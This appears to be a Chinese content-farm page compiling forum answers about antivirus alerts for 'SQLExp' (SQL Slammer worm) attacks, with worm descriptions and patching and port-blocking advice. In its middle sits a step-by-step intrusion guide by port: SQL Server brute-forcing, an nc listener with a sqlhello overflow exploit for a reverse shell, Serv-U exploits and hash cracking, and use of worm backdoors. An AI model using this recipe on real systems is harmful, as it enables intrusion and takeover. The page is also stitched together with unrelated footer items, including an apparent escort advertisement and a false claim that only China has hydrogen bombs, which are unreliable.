exp被黑客攻击了吗(apex被黑客入侵)

hacker3年前黑客工具111
本文导读目录:

计算机杀毒软件总是提示有信息成功拦截 1个 针对本机的SQLExp攻击

呵呵,你把它的监控调到高级别了吧,建议调到中,那些接收数据包的就没有的,而那些SQLExp攻击是针对网吧等数据库的,对我们一般的家用户是没威胁的,放心就好,

SQLExp是什么文件,为什么黑客老攻击它如题 谢谢了

“蠕虫王”是一个极为罕见且极其短小的蠕虫病毒,英文名为Worm.SQLexp.376,主要通过 Microsoft SQL Server的漏洞发动攻击,极具破坏力。 蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度 极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器。易受 “蠕虫王”攻击的机器类型为所有安装有Microsoft SQL Server 2000并且没有修补漏洞的 NT系列服务器,包括WinNT/Win2000/WinXP等,不会感染Win9X系统。由于蠕虫王并不对是 否已经侵入系统作判定,所以其不停的入侵将会造成拒绝服务式攻击,从而导致被攻击机 器因瘫痪而停止服务,危害极为惊人。

为什么攻击我的电脑SQLExp?

防火墙只是根据端口来辨别攻击的.这通常不准确,所以应该是对应端口被攻击而已.而防火墙把所有不符合规则的数据包都称之为攻击,有时这些攻击其实就是正常的数据包.

怎么解决SQLexp被攻击?

只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,

黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。

端口 协议 应用程序

  21 TCP FTP

  25 TCP *** TP

  53 TCP DNS

  80 TCP HTTP SERVER

  1433 TCP SQL SERVER

  5631 TCP PCANYWHERE

  5632 UDP PCANYWHERE

  6(非端口) IP协议

  8(非端口) IP协议

将下面的端口关闭

TCP

  21

  22

  23

  25 TCP *** TP

  53 TCP DNS

  80

  135 epmap

  138 [冲击波]

  139 *** b

  445

  1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b

  1026 DCE/12345778-1234-abcd-ef00-0123456789ac

  1433 TCP SQL SERVER

  5631 TCP PCANYWHERE

  5632 UDP PCANYWHERE

  3389

  4444[冲击波]

  4489

  UDP

  67[冲击波]

  137 netbios-ns

  161 An SNMP Agent is running/ Default community names of the SNMP Agent

端口入侵:

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

=============================

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(小榕的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

======================================

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

金山毒霸:成功拦截一个针对本机的SQLExp攻击 什么意思?

一般来说是 利用电脑 的SQL漏洞进行攻击,只要打上补丁,把漏洞补上就可以了

急急急~~电脑高手进.SQLExp病毒是怎么回事

SQLEXP是“蠕虫王”

“蠕虫王”蠕虫文档:

病毒名称:Worm.SQLexp.376

危险级别:中

破坏性:中

传播速度:高

病毒特征:蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器。该蠕虫攻击安装有Microsoft SQL 的NT系列服务器,该病毒尝试探测被攻击机器的1434/udp端口,如果探测成功,则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞,使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。由于蠕虫王并不对是否已经侵入系统作判定,所以其不停的入侵将会造成拒绝服务式攻击,从而导致被攻击机器因瘫痪而停止服务,危害极为惊人。

历来以对数据保护完整性著称的SQL Server数据库居然也存在漏洞,并被黑客利用,这大大出乎人们的意料之外。2003年1月25日爆发的Win32.SQLExp.Worm蠕虫病毒带给我们的启示是多方面的。归根结底,这又是一次由微软系统的漏洞引发的互联网危机。

趋势科技总裁张明正先生曾经预言:全球每18个月就会有一种影响巨大的恶性病毒发生。2003年1月25日爆发的影响全球80%网民上网的Win32.SQLExp.Worm蠕虫病毒,相距2001年7月份给全球信息系统带来深重灾难、并从此改写病毒发展历史的红色代码和Nimda病毒,正好整整18个月!

SQLExp曾经导致中国 *** 在2003年大面积瘫痪,专杀工具没什么,打好补丁就可以了。

相关的微软补丁下载地址为:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602

针对本机的SQLExp攻击,“蠕虫王”病毒名称:Worm.SQLexp.376

应该说你的电脑没事 你按的是金山吧.那已经被拦截了

这是你所处的那个局域网内有病毒或工具在扫描你

相关的知识:

SQLExp攻击是什么攻击?

“蠕虫王”蠕虫文档:

病毒名称:Worm.SQLexp.376

危险级别:中

破坏性:中

传播速度:高

病毒特征:该蠕虫攻击安装有Microsoft SQL 的NT系列服务器,该病毒尝试探测被攻击机器的1434/udp端口,如果探测成功,则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞,使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。

病毒查杀防护

1,直接下载微软指定的补丁程序 或者 安装Microsoft SQL Server 2000 SP3。

2,在防火墙或者路由器上阻塞外部对内的和内部对外的UDP/1434端口的访问。

3,如果由于DoS导致系统反映慢,可先断开连接,然后在Windows任务管理器里强行终止进程SqlServr.exe,打上相应补丁并重新启动服务.

拦截针对本机的SQLExp攻击, 来自 218.64.237.146

看看是在哪个端口的

然后把端口屏蔽了就可以了

我也经常碰到扫描我SQL的嗅探。一般在路由器上查到是哪个端口

然后再在本地IP安全策略里封了端口就可以了。

相关文章

北京商务儿价格表3000一次【严红恋】

北京商务小学妹价格表3000一次【严红恋】 今天给大家分享的内容是“北京商务小学妹价格表3000一次【严红恋】”,我是严红恋,来自崇左市,今年21岁,作为职业:未透露,我热爱我的职业:未透露。三圍...

黑客股民资源(黑客资源共享)

黑客股民资源(黑客资源共享)

本文导读目录: 1、红杉资本遭遇黑客攻击,投资者信息或已被窃取,黑客都是怎样攻破防火墙的? 2、股民在股票账户里的钱安全吗?能被其他人挪走吗? 3、黑客们常说肉鸡什么的是什么意思? 有什么作用...

查开放房软件app下载的最新方法(网上免费查开

企业规模一般分为特大型、大型、中型、小型等分类。对于不同的企业规模,适合的邮箱类型也不一样。那么,公司在选择时,用163VIP邮箱好还是163企业邮箱好呢?下面,小编分享选择邮箱的2大技巧!...

香港房产信息:将军澳慧星汇加推25舖应市 浪澄

文章转载自:香港地产资讯网 将军澳慧星汇加推25舖应市 由资深投资者蔡志忠等人投资持有的将军澳慧星汇,周六拆售首批50个舖位,不足40分钟成功沽清,大约套现1.3亿米。大业主刚加推25个舖位应市,...

i系列处理器(i系列处理器后面的数字)

i73630QMi7:7是系列,属于高端系列,共有i3,i5,i7,数字越大档次越高;3630:第一个3,第3代i系列CPU,表示第3代;6:区。 表示区别不同处理器的型号、代数。2开头就是第二代,比...

世界上唯一有氢弹的国家(世界上唯一有氢弹的国家是中国吗)

世界上唯一有氢弹的国家(世界上唯一有氢弹的国家是中国吗)

为什么只有中国有氢弹 氢弹为什么只有中国有因为大物理学家于敏所创造的“于敏构型”物美价廉的优点,所以中国是现在世界上唯一拥有氢弹的国家。制造出后要在短时间能用掉否者容易出事失效。因为中国氢弹的弹头可以...